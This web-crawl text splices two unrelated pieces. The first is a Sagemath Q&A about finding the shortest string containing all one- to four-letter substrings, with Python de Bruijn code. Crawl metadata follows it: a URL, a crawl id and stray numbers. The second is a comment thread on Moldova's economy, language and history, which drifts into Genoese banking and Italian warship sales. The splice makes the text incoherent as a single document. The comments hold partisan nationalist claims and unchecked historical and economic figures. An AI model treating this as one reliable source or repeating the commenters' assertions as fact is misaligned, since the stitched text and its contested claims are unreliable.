The shortest string containing all given substrings I found a problem from... . An English translation goes like this: A person wants to learn playing tuba. His neigbours get angry for the noise so he tries to find a song that contains as few tunes as possible that he is able to play all four or less tune combinations. The tunes are c, d, e, f, g, a, and h. Output the minimal song. I tried a code from... . def de_bruijn(k, n): """ de Bruijn sequence for alphabet k and subsequences of length n. """ alphabet = k k = len(k) a = [0] * k * n sequence = [] def db(t, p): if t > n: if n % p == 0: sequence.extend(a[1:p + 1]) else: a[t] = a[t - p] db(t + 1, p) for j in range(a[t - p] + 1, k): a[t] = j db(t + 1, t) db(1, 1) return "".join(alphabet[i] for i in sequence) seq = de_bruijn("cdefgah", 4) print(seq) But the validator on the site says that hccc is missing. So, how can I use Sagemath to solve the problem that if a set contains letters a, c, d, e, f, g, h, how to find the shortest string containing all one to four letter long substrings? If you want a Sagemath solution, there is.... You would have to translate the numbers 1, 2, ..., 7 to the letters a, c, d, ... h, but that should be easy.
https://ask.sagemath.org/question/47438/the-shortest-string-containing-all-given-substrings/
CC-MAIN-2019-47
refinedweb
241
81.83
Difference between revisions of "Possible Type Confusion issue in .Net 1.1 (only works in Full Trust)" Revision as of 19:28, 24 July 2006 while doing my Rooting the CLR research I found something which I thing could be a 'Type Confusion issue' in .Net 1.1 (see more details about these issues in this great document on Java Security published by the LSD Research group) Here are my test: 1) Compile this: using System; namespace RootingTheClr { class classTest { public static void Main() { Console.WriteLine("\n\n classTest \n\n"); normalClass ncTest = new normalClass(); maliciousClass mcTest = (maliciousClass)new maliciousClass(); normalClass ncTestTarget = ncTest; Console.WriteLine("Public = " + mcTest.iPublicVar + " Private = " + mcTest.iPrivateVar ); } } class normalClass { public int iPublicVar; private int iPrivateVar; public normalClass() { iPrivateVar = 100; iPublicVar = 999; } } class maliciousClass { public int iPublicVar; public int iPrivateVar; public maliciousClass() { iPrivateVar = 1; iPublicVar = 9; } } } 2) and you should get this (note the value of Private): csc classtest.cs Microsoft (R) Visual C# .NET Compiler version 7.10.3052.4 for Microsoft (R) .NET Framework version 1.1.4322 Copyright (C) Microsoft Corporation 2001-2002. All rights reserved. classTest.cs(21,15): warning CS0169: The private field 'RootingTheClr.normalClass.iPrivateVar' is never used classTest.exe classTest Public = 9 Private = 1 3) run ILDASM on the exe: ildasm classTest.exe /out:classTest.il // WARNING: Created Win32 resource file classTest.res 4) Notepad it and make this change: notepad classTest.il replace IL_0010: newobj instance void RootingTheClr.maliciousClass::.ctor() with IL_0010: newobj instance void RootingTheClr.normalClass::.ctor() 5) Ilasm the file ilasm classTest.il Microsoft (R) .NET Framework IL Assembler. Version 1.1.4322.573 Copyright (C) Microsoft Corporation 1998-2002. All rights reserved. Assembling 'classTest.il' , no listing file, to EXE --> 'classTest.EXE' Source file is ANSI Assembled method classTest::Main Assembled method classTest::.ctor Assembled method normalClass::.ctor Assembled method maliciousClass::.ctor Creating PE file Emitting members: Global Class 1 Methods: 2; Class 2 Fields: 2; Methods: 1; Class 3 Fields: 2; Methods: 1; Resolving member refs: 8 -> 8 defs, 0 refs Writing PE file Operation completed successfully 6) execute it (note the value of Private) classTest.exe classTest Public = 999 Private = 100 7) This means that we successuflly were able to cast an object of the class normalClass into an object of the class maliciousClass. The attack vector occours because iPrivateVar is a pubic var in maliciousClass and a private var in normalClass class maliciousClass { public int iPublicVar; public int iPrivateVar; ... class normalClass { public int iPublicVar; private int iPrivateVar; ... --------- - 8) what is interresting is that this only works in Full Trust, if you try to run this in a partial trust environment like from a local network share) you will get the following error: classTest.exe Unhandled Exception: System.Security.VerificationException: Operation could destabilize the runtime. at RootingTheClr.classTest.Main() This means that the CLR in partial trust does do some verification on the compliled Byte code which is not done in Full Trust (which will mean that Microsoft Security Response Team will say that this is not a vulnerabiltiy and occours by design :)
https://www.owasp.org/index.php?title=Possible_Type_Confusion_issue_in_.Net_1.1_(only_works_in_Full_Trust)&diff=8057&oldid=7566
CC-MAIN-2014-15
refinedweb
509
50.12
Upload file to SharePoint library using File Control and PnP JS in SPFx webpart In this article, we will learn how to upload files to the SharePoint library using File Control and PnP JS in SPFx web parts. Pre-requisites – You have created SPFx webpart created and Select react Framework. Please note that this can be used using No Javascript framework or Vue.js. Only difference would be how you rendering your input control and getting context. That is a different story. We would use SP PnP js library module for SPFx web part. Install it in your SPFx solution using below command. npm install @pnp/sp --save Added import statement in webpartcomponent.tsx file import { sp } from "@pnp/sp"; Below should be your render method. public render(): React.ReactElement<ISpFxWebCamProps> { return ( <div className={ styles.maincontainer }> <input type="file" ref={(elm) => { this._input = elm; }}></input> <p> <button onClick={() => this.uploadFileFromControl()} > Upload </button> </p> </div> ); } Add our uploadFileFromControl method, please note here MyDocs is library name. private uploadFileFromControl(){ //Get the file from File DOM var files = this._input.files; var file = files[0]; //Upload a file to the SharePoint Library sp.web.getFolderByServerRelativeUrl(this.props.context.pageContext.web.serverRelativeUrl + "/MyDocs") .files.add(file.name, file, true) .then((data) =>{ alert("File uploaded sucessfully"); }) .catch((error) =>{ alert("Error is uploading"); }); } That’s it, let us test this out. Run gulp serve and browse workbench.aspx from your SharePoint site. Select a file and click on upload. Let go to library to check if document is uploaded. Thanks for reading..Happy coding..!!!
https://siddharthvaghasia.com/2019/10/16/upload-file-to-sharepoint-library-using-file-control-and-pnp-js-in-spfx-webpart/?utm_source=rss&utm_medium=rss&utm_campaign=upload-file-to-sharepoint-library-using-file-control-and-pnp-js-in-spfx-webpart
CC-MAIN-2020-16
refinedweb
258
53.47
clarify the language issue: calling Moldovan language Romanian is like calling English language American! Moldovan state and Moldovan language existed since 14th century, on the other hand the term 'Romanian' only appeared in the 19th century... I would like to kindly ask Romanians to stop interfering into our life in Moldova. It is not your land and no one wants you here. 1 There's no logic in what you're saying. 2 Stop discussing the language stuff, there have already been like 50% of the comments on the article about this. reply to the other threads. Moldova is simply part of the territory of Romania grabbed by Stalin as a result of the 1939 Molotov-Ribbentrop Pact and confirmed in the Yalta and Potsdam agreements as part of buying Stalin's participation in the war against Hitler. What didn't help the Romanians was that they became Hitler's allies after Stalin's land grab. Nobody asked the Moldovans whether they wanted to be seperated from Romania, their historic country. Moldovan as a language is simply Romanian with a dollop of post 1945 Russian/Ukrainian which came in on the back of occupying Red Army units and Soviet Russian officials. No one asked Moldovan people if they wanted to be separated from the dying Russian Empire in 1918: there was no referendum and the Council (Sfatul Tarii) that voted the Union was created simply by a conference of the Moldovan soldiers. The vote for Union in the Council took place once the Romanian Army had already occupied Chisinau. So, please, stop presenting the history like if it started in the 1920s: Moldovan was part of Romania only for 20 years. All borders of Europe changed many times and if we start claiming the former territories there would be a really big mess. It's time to start improving the situation of the State, not dreaming about Russia, USSR or Romania. And stop speaking about the name of the language: calling it Romanian or Moldovan doesn't change anything in the economic development of the country. Use your time to elaborate a valid economic strategy! I'm sorry - what book of history did you use in high-school? What about Mihai Viteazu? What about Alexandru Ioan Cuza? As for the valid economic strategy, there will be none till the people would take more interest in the decision-making process! Here nobody cares to step up and fight for justice as a citizen - we always expect someone else to do it! With this argument in mind, in 1812 when the Ottoman Empire gave Basarabia ( Republic of Moldova) away to the Russian Empire the Moldovans were not asked either. Also the Moldovan people did not seem to protest and complain about the Romanian 'occupation' and was probably the last period this region thrived. More, most recently Basarabia (Republic of Moldova) was part of Romania from 1918 to 1940 and then from 1941 to 1944 so it's a bit more than 20 years. As for the language, people are just stating the obvious.And it is not our job to come up with an economic strategy for Moldova, usually that is what the government and parliament are for !! You cannot go back to Middle Age with Mihai Viteazu: that was a patrimonial State, not a nation state, it doesn't have any impact on today's history, it's just a far memory. And as regards Cuza, when he became king of the two principalities Bessarabia was already part of the Russian Empire. I just wanted to say that it's time to stop dreaming about solving the problems by becoming part of another entity. As regards the second sentence, I agree with you, I lived in Moldova: if people don't fight as citizens, they cannot improve the situation, but if the intellectuals don't consider the State a legitimate one, how can they pretend that people fight for it? I don't want to say that people were asked if they wanted to be part of the Russian Empire, my argument is that the borders should not be put into question today, or it will create problems to all Europe (do you want to give back Transilvania to Hungary?) and the solution should be found inside the country. I'm sorry, but the direction of the economic development of the country is the result of an elaboration by society and intellectuals, then politics interpretate it with parties and apply it: thinking that this is a duty of the government is quite Soviet style... Fine, I can see your point about the borders but I don't think you should have given Romania as example and as occupiers when the Russians did what they did to Moldova. Soviet you say ? I don't think so, I think it's more realistic. Unfortunately, the politicians are the ones that control the economic strategies for better or for worse. The society and even more the intellectuals have almost no saying in this. What you say is correct but this principle is not really applied in most countries including Moldova. Imperial Russia in its post 1612 expansion has swallowed many peoples, nations and indeed states. Since 1989 the process has at last been reversed. Hopefully permanently! Moldova and Bessarabia are just two of many parts of EurAsia that were forced to become constituent parts of the Russian Empire (White and Red).Historically both were medieval core regions of the modern Romania. The native inhabitants (not imported inhabitants) of such regions should be allowed to freely choose the State they wish to belong to. If Moldovans wish to join Romania, then provided Romanians themselves approve of such a unification, they should be allowed to do so. As to "parachuted" Russians, they should either fully integrate or leave. Moldovan language does not exist, it is not similar to romanian, it is exactly the same language! just a small comment, 'moldovan' langauge is in fact Romanian; its designation as an official language is made solely on political reasons; linguistically, the some small differences in accent or lexic would perhaps not even qualify it as a dialect Not a success story yet - but is going there. And with Romania's help too. However, by mentioning the existence of a "similar" Moldovan language, The Economist only helps promote the old stalinist ideology of two different languages and cultures (Romanian and Moldovan) upheld today by groups whose desire is not to join the EU someday, but to be a part of a new pseudo-Soviet Empire like the Eurasian Union. I hope and believe your newspaper does not endorse such a path for Moldova... The Trans Dniester story is just an excuse. On both sides. Look at Cyprus for example. Turkish army present. Moldova has far more problems than just Transnistria. And slogans like "Moldova changed to better" ? It's a myth. Never in it's present history was my country in such a bad desperate condition. People are hopeless. And not much will change in the near future. GDP ? We produce merely nothing. All our economy is based on immigrants revenue. Tax is coming from service sector. The worse thing is that present political parties build their credentials on false promises. Mostly about Visas to EU and integration to EU. As of Moldovans and Romanians. We share the same language. We share a big deal of history, but we are different. And not different like Cyprus and Greece. We are different nations. The last century made a big difference. And over 75% of population consider themselves Moldovans. Not Romanians. Because we are not. And about the change ? When we will be able to get rid of corruption, we can say that something changed. But every one of us has to change. When the first dirty official will go to jail on a corruption charge then will be some change. And that will not happen. Not in the near future. It's sad. Very sad but this is the hard truth. Moldovans and Romanians are not different nations. At least not it my point of view. Moldova is a historical region that is now split between Romania, Ukraine and the actual Republic of Moldova. In a sense, those on the west side of the Prut river are just as Moldovan as we are, and we are just as Romanian as they. tell that to moldovans from Iasi. i also advise you to visit Romania and see the "olteni", "maramureseni", etc. to give you a bit of flavor of what includes "romanian". but what can you do - 50 years of brainwashing in USSR will not disappear to fast. Looks like a PLDM member wrote the article. Pretty fair though. actually you're wrong, no PLDM, never, this party is working just for own interests. I agree that Moldova is not yet a member of European Union and we need to have an realistical approach, but this doesn't mean that in the next 10 years the situation is gonna be the same, of course in Moldova there is still a strong geopolitical influence from Russia, but the direction chosen by Moldova is a a good one, i mean European direction by promoting EU values. being one of the poorest country in europe doesn't change the situation because in a small country as Moldova is much more easier to have a good economical groth...i want also to say that i prefer European approach by promoting democracy then the US model ;) Moldova is unfortunately far from a successful story. It is the poorest country in Europe, almost a quarter of Moldovans left to work in Europe, corruption and communism are still deep rooted in the Moldovan society.More, it is a social and cultural split country (people either support Europe/Romania with whom they share their history and language or Russia/Eurasian union) and it is still dominated and brainwashed by the Russian propaganda that tries to turn them away from Europe and make them join Eurasian union(some kind of modern USSR if you ask me). I hope for the best (Europe) for Moldova but it will be a feat very hard to achieve. Oh and there is no such thing as Moldovan, even though their (communist) constitution says so. Literary 'Moldovan' and Romanian are identical. Moldova isn't merely one of the poorest places in Europe - it is by far the poorest place in Europe. Here's a comprehensive list of all the European countries with a lower 2011 nominal GDP/ capita than South Africa ($8,070): Montenegro ----- $7,197 Bulgaria ------- $7,158 (the only EU country in this category - and it probably won't be there for long) Azerbaijan ----- $6,916 Serbia --------- $6,203 Belarus -------- $5,820 (suspect numbers - no honest stats) Macedonia ------ $4,925 Bosnia --------- $4,821 Albania -------- $4,030 Ukraine -------- $3,615 Kosovo --------- $3,593 Armenia -------- $3,305 Georgia -------- $3,203 Moldova -------- $1,967 Moldova is so much poorer than anywhere else in Europe, that it really wouldn't look out of place in Sub-Saharan Africa (at least going by GDP stats - obviously, as with the rest of Europe, social indicators like education, health or life expectancy are far better than GDP would suggest). There is no sense in which Moldova can be described as a success story - not yet. On the bright side, Moldova's GDP per capita (euro denominated) has grown 90% in the past 5 years; its PPP GDP per capita has grown 32%. So the country is making progress from a horrifically low base. Moldova also stands out against Russia, Belarus or Azerbaijan as a place that seems to have more genuine aspirations for integrating with Western norms, safeguarding human & civil rights and chasing long term prosperity. Aspirations are great - but we can't call it a success story until there has been far more progress in this direction. Shaun, Moldova has two basic economic problems: the lack of good road connections to places westward in Europe - and the lack of independent, national energy sources. Both of these could be solved relatively easily by the EU, if we were not so damned occupied with the Euro-crisis. Of the five million foreigners now resident in Italy, one million are Romanians, 225,000 Ukrainians and 140,000 are Moldovans, who are the seventh-largest immigrant group to Italy and the fastest growing (together with the Romanians). Absorbing such a large number of Romanians and Roma has not been without difficulties. Many immigrants are furious over the low wages being paid here. But my sense is that the integration will improve over time and has become a fairly permanent phenomenon. And, there is no particular prejudice against Moldovans per sé (although all foreigners have their complaints). I think Moldova is one of those small places that Italians like to invest in - a bit under the German radar, so to speak. But there can be no doubt, I think, that the real problem is restoring Romania's economy to solid growth through solid consumer confidence... Consumer confidence has a part to play; general business investment (for raising both productivity and exports) is even more important (in the case of Romania). Are there many businesses (established or new; domestic or international) which can see opportunities to invest in Romania and beat the local competition in terms of productivity? Consumer confidence (current spending levels) is only ever a very short run problem. It is underlying productivity and capacities that really matter for long run & sustained prosperity. "..Of the five million foreigners now resident in Italy, one million are Romanians, 225,000 Ukrainians and 140,000 are Moldovans.." I assume that the rest must be immigrants from North Africa ? @ Milovan/Joe: "I think Moldova is one of those small places that Italians like to invest in - a bit under the German radar, so to speak" _________________________________ Too late: (22. 08. 2012) These Barbarians! Gee Josh. Angela Merkel visited Moldova. That's nice. A series of videos from the Italy-Moldova website, including "Moldova seen from Italy": 1) Romania - 1,000,000 2) Albania - 490,000 3) Morocco - 460,000 4) China - 230,000 (many from Hong Kong) 5) Ukraine - 225,000 6) Phillippines - 140,000 (many are members of the Catholic clergy) 7) Moldova - 140,000 8) India - 125,000 9) Poland - 110,000 10) Tunisia - 105,000 11) Perù - 100,000 12) Ecuador - 95,000 13) Egypt - 90,000 14) Macedonia - 90,000 15) Bangladesh - 85,000 We also have many dual citizens from the US, Canada, Argentina, Chile, Brazil and Uruguay, as well as Colombia (named for Columbus) and Venezuela (named for Venice) not included in these numbers. Although Italy has long been not a very receptive country for immigrants (being mostly a source of emigration itself for many decades) the reality is changing - especially as Italians themselves make almost no babies. Upwards of one-third to one-half of babies born here are now non-Italian or only half-Italian by blood. A little anecdote, perhaps apocryphal: I was recently asked by a 70-year-old friend - given that I speak English - to help her track down a nephew living in the US. This friend's brother had married a Moroccan women 25 years ago. He had a child by this woman - but she turned out to be fairly dishonest. After a few years of life together, she stole 15,000 euros from his bank account and went back with her child to Morocco. They did not ever speak again, although the Italian family heard that she had later moved with her son to the US. The father (brother to my friend) died recently. Like most Italians of 70, he had three houses (worth probably €500,000 together) land, and cash-savings in the bank of 400,000. The man's family despised his former wife - but the son was a different matter. Unless he were to demonstrate bad faith, the Italian family was well-disposed toward him - and went through great trouble (also with my assistance) to track him down in the US. At one point, they also hired a private investigator in New York... the son was found, basically penniless and behind on his rent. He was informed that the inheritance, free of any debt/liens, was waiting for him in Italy. Last I heard, he had moved to Italy and was filing for citizenship (his right, under the law) to adopt a new life. @ Milovan/Joe: Did you notice the odd post-communist marching band they sent across the tarmac (second half of clip)? Quite funny! You are late Joe Milovan. Twice late :)... "You are late Joe Milovan. Twice late :)" Says who? From the middle of the 13th century to the middle of the 15th century, the Black Sea was a Genoese lake - our navies commanded by the Black Sea from Constantinople, Crimea, Trebizond, Sochi - and the Moldavian towns that we called Licostomo (Chilia Noua), Moncastro (Cetatea Alba or Bilhorod Dnistrovskiy) and Caladda (Galati). This economic system was lost with the Fall of Constantinople in 1453 and the successive conquest of Caffa in the Crimea by the Turks. The Genoese of Caffa, with the city bankrupt after wars with Venice, the Ottoman Turks and the Aragonese, asked Polish King Kazimierz to accept vassalage over Kaffa in 1462. Also, the Kingdom of Sardinia used its lordship of Genoa - and the city's historic ties to the Black Sea - as a pretext to participate in the Crimean War in 1854, sending 18,000 troops to flank the Ottomans, French and British against the Russians. This was the famous incident in which Conte Camillo Benso di Cavour used Turin's place at the victory table to plead for the cause of Italian unity - and convince France and the UK that a resurgent Italy under the House of Savoy would be a good ally for the western powers. A bit more seriously... There is a lot of attention in Italy to Poland - both economically and politically. Yes, Poland's Ostpolitik is well known. I personally am a great supporter - as are many others here. Unfortunately, Silvio Berlusconi personalised our Republic's relations with Russia - to the not very minor annoyance of the Romanians (and probably the Moldovans as well). So, no help from Rome regarding areas east of the Bug River. This must change soon. Time for our navy to head back into the Black Sea. The Americans are leaving, the French are selling capital ships to the Russians, and Bulgaria and Romania are representing NATO in the Black Sea, together with the Turks - wo are not yet in the EU... I think our ships should be travelling to the Romanian coast. Plus, our navy has put up 20 ships for sale - possibly to the Philippines or Perù. These include a number of small destroyers originally commissioned by and built for Saddam Hussein in the 80's (and never delivered). So, why can't a small price be paid by NATO to purchase these ships from Italy and transfer them to our Black Sea allies? Time to start acting as though the EU cares about the Balkans and the Black Sea again... Joe Milovan, nothing against what you call Genoese colonies, as they were simply ports and very supportive to local economies not just for the profits of it's operators. Good job! However, knowing you so well by now :-) I am afraid that you'd like to blur a little bit otherwise sharp difference between Genoese economical influence and the general meaning of the word 'colony' :) Which is contra-productive since old Genoese, at least in Poland are looked at as clever merchants, and not the loot-type classical colonialists. Also, I am afraid that you will tend to overlook the fact that Genoa never managed to actually enter the in-land, beacause she was solely a sea power, not the land power. In my mind an example what happens when major land-power's interests turn to sea and on the route to sea stands a sea-power without mandlass roots, is what happened at the end of 14th century in Dalmatia - Hungary wanted access to sea and got one, winning it from Republic of Venice (c.f--> Zadar Treaty). Btw. I thought that as a commited local patriot you'd side with R.Venice not of R.Genoa? As to present times - we almost completely agree. Nonetheless you plan is not quite clear to me. When you write >Joe Solaris: why can't a small price be paid by NATO to purchase these ships from Italy and transfer them to our Black Sea allies?< what do you mean. Who is to play the small price? Isn't Italy a NATO member?? Or do you mean that all of the NATO countries should actually pay a small price to Italy to enable Italy sending her ships to Black Sea? Also, I am not sure what do you mean when you say >time to start acting as though the EU cares about the Balkans<. Isn't Italy an old-EU's, rich, affluent, living in peace and democracy since almost 70 years, outpost to Balkans? Why not simply act, provide technical and other support, including informative one, on the other hand - provide arguments understandable by other EU-members why Balkan direction is so important. Why Italy is not doing that? Instead, all I read - here :-) - from you is how Italy longs for French military leadership and how she is ready to support the French 'North African' vector of the EU. France will manage without your support, why not start acting in YOUR region of interest? P.S. This is a friendly comment. (As all mine :) I hope you are better now and won't react as if I bite you. 1) NATO has a small budget and spends money especially to help its poorer members. Italy's navy is a big larger on better than in reality because we are keeping afloat many older ships that hardly ever leave port and should be retired - but we also receive a certain amount of money for each ship in the navy, like all member states (did you know this?) So, the 20 ships we are putting up for sale might fetch 150-200 million in all. Not so much that we are willing to give it away without getting some cash in return (to continue the new shipbuilding programme this year) but small enough for NATO to make a contribution to keeping those ships in Europe (which would double the effective firepower of the Romanian and Bulgarian navies). 2) As a former defeated country from WWII - having signed an agreement with our victors - the US, Russia, France and the UK - not to ever acquire nuclear, chemical or biological weapons, plus other restrictions, we have no precedent for military action of our own. Therefore, we move only when led by one of the victors. Of these conquering powers, there is no question that we are closest to the French people by language and history. They have already governed ample parts of Italy in the past - and Napoleon and Garibaldi unite France and Italy. Remember, Pilsudski may have been born in Lithuania, but Garibaldi was born and died a French citizen. Nor should we forget the Armée des Vosges from the Franco-Prussian War: 2000 volunteer Genoese Carabinieri led by Garibaldi, entrusted by the government of the Republic to defend France - the only victorious French army of the war and the only army to capture a Prussian battle-flag (61st Pomeranian Regiment). 3) "Classic colonialism"? You mean what colonialism became under the English and other nation-states? Genoa invented modern colonialism. The colonialism was hardly JUST "mercantile". The Genoese colonies financed all the local kingdoms in those years - including the crown of England, from the colony in Southampton. Genoese colonies everywhere were superior in military strength and technology than the armies of the local kingdoms - that is why they survived so long. Genoese Crimea resisted many attempts at conquest - including siege by powerful Mongol armies. And they did spread inland - but when they did, they tended to marry with local women and slowly assimilate. "There were some 33,000 descendants of the Genoese colonists in Istanbul and Izmir in 1933." " Some Italian descendants still existed in Crimea in the early 20th century, and were among the ethnic groups suppressed by Joseph Stalin.[6] The fall of the eastern colonies caused a deep economical crisis which eventually turned in an unstoppable decline for the Republic of Genoa as a major European power.[7] While its longtime rival, the Republic of Venice, was able to maintain some continuity between the capital and its eastern possession, Genoa could not. It thus moved its interests in the western Mediterranean, establishing flourishing communities in Cadiz and Lisbon. Genoa, in particular, became an efficient banking base of Spain." (Wikipedia). As a result, as recently as 1892, one half of all Italians in the New World, from Alaska to Tierra del Fuego, were Genoese - we founded all the colonies of Italians in the West. And the Genoese became the backbone of the middle classes throughout Spanish-speaking South America (the Venetians instead moved into Brazil). Compare the most common surnames in Genoa with the telephone directories of all South America's major cities - there are an amazing number of Genoese descendants in the continent. You underestimate our role in history. There were five historical strands of finance/banking in Genoa: The sovereign debt financier - the Bank of Saint George (Banco di San Giorgio); Napoleon looted this bank in 1805 to form today's central Bank of France. The Catholic charity bank for the poor - Savings Bank of Genoa; one of the oldest banks in the world, founded in 1483 by the monk "Brother Angelo from Chivasso" they are still doing quite fine in the midst of the current international crisis, and have risen to become Italy's sixth-largest bank. The private sector bank of Genoese immigrants - Bank of America in San Francisco - which founded the Banca d'America and d'Italia in the peninsula in 1919; This insitution was not only the world's largest bank for half a century, but was also the largest financial institution remaining with branch networks in both North America and Europe in 1945. Thus the United States government used this bank to transfer the Marshall Plan money to western Europe after the war. Italy's largest private bank was acquired by Deutsche Bank in 1986 as the German agency's first big international expansion - the division has been Deutsche Bank's most solid subsidiary since then. Banca di Genova was the bank of the city's port, steel-making, shipbuilding and military industries, sponsored mostly by the Savoyard government in the 1800's to finance expansion of the economy of the Kingdom of Sardinia. BTW, this bank was most involved in dragging Italy into WWI, for business reasons. The Banca di Genova, founded in 1870, became Credito Italiano in 1901. Credito Italiano acquired the Credito Romagnolo Bank (itself founded in 1473) in 1995 and became Unicredito Italiano in 1998, later becoming Unicredit. (They bought Bank Pekao in 1999). They are now not only second largest in Poland, Romania and Slovenia, but also the largest bank in Italy, Austria, Slovacchia and Bavaria (and third-largest in all of Germany). Finally, there was the public Mint of Genoa, which stamped the Lira coins from 1138 to 1814. In 1815 the coins became the Sardinian Lira (and the Italian Lira in 1861, which in 2002 became the Euro). The Mint became known as the Banca di Genova which in 1849 became the Banca Nazionale degli Stati Sardi, with the sole power to print banknotes in the Kingdom of Sardinia. This became the National Bank of the Kingdom of Italy in 1867 which assumed the name "Banca d'Italia" in 1893 (Italy's central bank today). Ok, got it Joe Milovan. All of NATO members should produce that little 150-200 million for Italy, so she can put the outdated junk on the Black Sea to secure Italian interests in the Balkans. . ------------------------ Your knowledge of history is excellent, but I would like to point out that: 1) There was no "Muslim Kingdom of Andalusia", there was the Emirate of Granada (Imarat Gharnatah), also known as the Nasrid Kingdom of Granada. 2) Your references to "Spain" are misleading."Spain" did not exist at that time, no more than "Italy". They were purely geographical references. Only after 1516-17, after Charles I of Habsburg inherited the Crowns of Castile and Aragon and went to the Peninsula, can the name Spain be used, and even then Castile, Aragon, Catalonia, Valencia, etc retained their own laws and parliaments. 3) There was not a "Spanish flag". The flag taken to the New World by Christopher Columbus was that of the Crown of Castile, In spite of the purely dynastic union between King Ferdinand II of Aragon and Queen Isabella I of Castile, the Aragonese weren't allowed to participate in the New World enterprise, which was a Castilian monopoly. -------------------- A few comments: Yes, the Genoese and the Catalano-Aragonese kept screwing each other for a long time. Romeo might have been a Catalan and Juliet a Genoese... It's remarkable that even in South America the Genoese and the Venetians kept their original geographical ubication, the latter in the east and the southeast and the former in the west and the south. " - we founded all the colonies of Italians in the West." We? You (thou) must very old, Milovan... ;-) Hello Sir! Good points - it is a bit difficult writing about historical events using contemporary words. Even more so in a few lines on a blog - and not an historical research paper at a university ;-) Good point about the name of the Muslim Iberian state - thanks for the point of clarification. I was attempting to refer to lands today called "Spain". Yes, of course - there was no Spain in 1492, amply demonstrated by the story of Isabella supporting Columbus (it would seem the Aragonese King Ferdinand was not entirely supportive - but perhaps his tacit approval was necessary for other reasons.) In Italy it is said that Columbus was a lover to Isabella - and convinced her thusly. I suspect the reasons had more to do with maintaining a balance of power between Aragon and Castile. Thanks for the info - I had completely forgotten that Columbus sailed under CASTILIAN (and not Aragonese) flag. Since we tend to use "Castellano" as synonymous with "Spanish" language today, I had forgotten the distinction. So in other words, the Genoese families of Seville (Soziglia in our language) were able to make alliance with Castile against Aragon, even as the two were marrying. I had not realised it went that far... Essentially, the Venetians were kept out of South American development. What happened was that Genoese Capital took advantage of the city's prominence during/after the Risorgimento to shut down the Venetian shipbulding industry (the "Arsenale"). The decision to tranform Venice into a tourist haven was made by a Genoese-influenced central government in the late 1800's - over the heads of the Venetians themselves. This story is a major factor behind the rise of the separatist Northern League today. On the other hand, as I sometimes like to point out, the Genoese lobby perhaps did the right thing for the wrong reason. The attempts by the Christian Democrats in the 1950's to create chemical factories in Venice/Marghera was a horrendous mistake. The Venetians wound up in Brazil as a confluence of two factors: one was the liberation of the slaves in the 1860's, which left the Portuguese at around 15% of the country - so that their leadership was eager to import European labour to avoid being overwhelmed racially. 2) the Genoese industrial victory over Venice was pushing many Venetians out of work, looking for places abroad (many moved to their former Adriatic colonies at that time under Austrian Hapsburg rule and many moved to Brazil.) Actually, we always said in Italy that Venetian language was closer to Castillian (hence the "calle" of Venice), Friulian is closer to Catalan (with its "peraulis") and Genoese (or Zeneixe since we Genoese call our city "Zena") closer to Portuguese. The Portuguese Navy, the world's oldest, was founded by a Genoese captain - and many residents of Madeira are of Genoese descendance. BTW, Pope Ratzinger is apparently in love with Christian Orthodox history - and Genoa's medieval role/alliance with those lands. He has proclaimed his support for the unification of the Eastern/Western churches and the partial renunciation of Papal Infallibility; and he has nominated ultra-conservative Genoese archbishops to all the important Curial positions - including, as of January this year, Archbishop/Patriarch of Venice (Ha! The first time ever in history - Genoa wins again!) Francesco Moraglia. Ratzinger is also very clearly (successfully?) preparing Cardinal Bagnasco of Genoa to succeed him as Pope. (Being an atheist, I refer to him as General Bagnasco, since he also carries the rank of four-star general as Italy's former Military Chaplain). Ratzinger apparently believes there is enough history and skill in the Genoese church to manage both unification with the Orthodox and to fend off the Muslim challenge. As for your final comment. I grew up in North America - Ontario, Michigan, Maryland and Virginia/DC. I am a "colonial" Italian - and my grandmother was a pillar of what was called the "Colonia Italiana" until WWII. Our Genoese traditions survive... and in fact, with Berlusconi having utterly discredited the Guelph leadership of postwar Christian Democrat Italy, we are preparing for a return to our former influence as important leaders of Ghibelline Italy. For 200 years, Moldovan trade was closely tied to Genoese trade through Constantinople. Ours were the closest relations Moldova had to Italy since Roman times. Our lobby in Italy is not going to forget about Moldova, especially if Bagnasco becomes Pope and brings forward Ratzinger's project of unification with the Orthodox Churches. That would unite both Ghibelline and Guelph Liguria with regard to a new "Ostpolitik". BTW, does this sound like ancient, irrelevant history? Check out the history of Genoese Mayor Marco Doria's family: Try reading the various entries in all the languages - such as Portuguese to see about their descendants in Brazil. Outdated junk? ;-) Once again, Forlana, you underestimate Genoa. 1) Virtually all Italian warships are built in Genoa/Liguria - Voltri, Riva Trigoso (Sestri Levante) and Muggiano (La Spezia). We beat Venice out during the Risorgimento, remember? Venetian shipbuilding got closed down in favour of Genoa. 2) Italian military shipbuilding is the descendant of Genoese shipbuilding - a thousand-year-old tradition. We have not ever built "junk", Forlana. 3) Just as an historical note, perhaps your opinion of the Italian Navy is influenced by WWII. Allow me to explain to you that our navy was the world's fourth largest at the beginning of the war: but it had a preponderance of Genoese and Neapolitan officers - every last man of whom spoke English. Our navy had no desire to fight against what they considered their long-standing allies. (The Italian Empire in Africa had also been built in partnership with the British). 4) Although hobbled by our defeat in WWII and our (imposed but popularly-accepted) renunciation of nuclear weapons and ships, Genoese military shipbuilding is second to none in the world today. Please check out the websites of Fincantieri and Oto Melara. For example, the Oto Melara 76 mm gun is the world's most popular naval cannon - used by 53 navies around the world on over 1000 military ships. Notice that the Genoese/Italian gun is also used on Poland's flagship(s), the Oliver Perry class frigates. Which brings me to my next point: 5) Unloading junk on the Black Sea? As opposed to the Americans unloading their Oliver Perry ships on Poland? ORP Generał Kazimierz Pułaski and ORP Generał Tadeusz Kościuszko are two ships launched in 1978 and 1979, displacing only 3,600 tonnes. The ships we are putting up for sale are all from the 1980's - and better than Poland's for their performance, achieving for example speeds of 33 knots rather than the 29 knots of the American ships. Those ships of ours would be more useful in Romanian and Bulgarian hands, where they would be perfect for use in the Black Sea. Let's not forget that the Romanian Navy's FLAGSHIP is the former British HMS Coventry, displacing 4,600 tonnes and originally launched in 1988 (they have two such ships; everything else is older or much smaller) and the Bulgarian FLAGSHIP is a former Belgian destroyer displacing 2,200 tonnes launched in 1978 (they have three such ships; everything else is older or much smaller). So, the current state of affairs in Europe is that Italy would be accused of "putting her outdated junk on the Black Sea to secure her interests" by suggesting NATO give a hand to transfer these ships from us to them. This because a) they haven't got the money to purchase the ships, and b) we need the money from selling the ships and cannot afford to give them away for free. Excellent. For these reasons, the Italian Navy has announced that negotiations are under way to sell these ships to the Philippines or Perù. God forbid we were to actually cooperate on defence matters in Europe... And tell me Forlana, if Romania and Bulgaria encounter problems with the Russian Black Sea Fleet, who will be called upon to send ships to support NATO "forces" in 